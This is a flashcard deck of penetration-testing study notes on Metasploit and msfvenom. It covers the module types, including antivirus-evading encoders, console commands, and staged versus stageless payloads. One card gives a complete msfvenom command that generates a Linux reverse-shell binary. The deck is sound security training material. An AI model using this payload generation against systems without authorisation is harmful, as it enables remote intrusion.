Brainscape's Knowledge GenomeTM

Browse over 1 million classes created by top students, professors, publishers, and experts.


See full index

Penetration Testing > THM 1/5/2023 - Metasploit and Msfvenom > Flashcards

THM 1/5/2023 - Metasploit and Msfvenom Flashcards

1
Q

What are the 3 main components of the Metasploit Framework?

A

msfconsole
Modules
Tools

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Define the following Modules
1) Auxilliary
2) Encoders
3) Evasion
4) Exploits
5) NOPs
6) Payload w/ 3 types
7) Post

A

Aux - Scanners, crawlers, fuzzers

Encoders - encode exploits and payload in the hope AV misses them

Evasion - Direct way to avoid AV

Exploits - self-explained

NOPs - Instruct the CPU to do nothing for one cycle; Used as a buffer to achieve consistent payload size

Payloads - Code that will run on the target system;
Type I - Singles: self-contained payload; no additional component or download needed
Type II - Stagers: responsible when setting up a connection; works well with Staged payloads
Type III - Stages: Downloaded by the Stager to allow you to use larger sized payloads

Post: Actions to do post exploitation

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Define the following commands
use
show
search
back
set
setg
unset
unsetg
exploit/run
background
sessions
help

A

use
show - list all modules
info - show more info about a module
search - conduct searches using CVE numbers, exploit names, or target system
back - go back/unselect a module
set/setg : set a variable / global variable
exploit/run : run module
background : send a session to the background and back to msfconsole
sessions : view background sessions
sessions -i # to bring forward a active session
help

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

What does ranking mean in metasploit?

A

Reliability of exploits

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Identify what this command does

msfvenom -p linux/x64/shell_reverse_TCP -f elf -o shell.elf lhost=[IP goes here] lport=[listen port goes here]

What difference does this make?
“linux/x64/shell_reverse_TCP vs linux/x64/shell/reverse_TCP”

A

-p = Payload
-f = file type
-o = name of output file

shell_ vs shell/
shell_ = this payload is all in one “stageless”
shell/ = this payload is part of a staged attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Explain what each of these mean in a console?

msf6>
meterpreter>

A

msf[#] - metasploit main console for all things metasploit

meterpreter - A shell gained on target console after attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

what is msvenom payload naming convention?

A

<os>/<arch>/<payload>
</payload></arch></os>

How well did you know this?
1
Not at all
2
3
4
5
Perfectly

Penetration Testing (13 decks)

Brainscape helps you reach your goals faster, through stronger study habits.
© 2024 Bold Learning Solutions. Terms and Conditions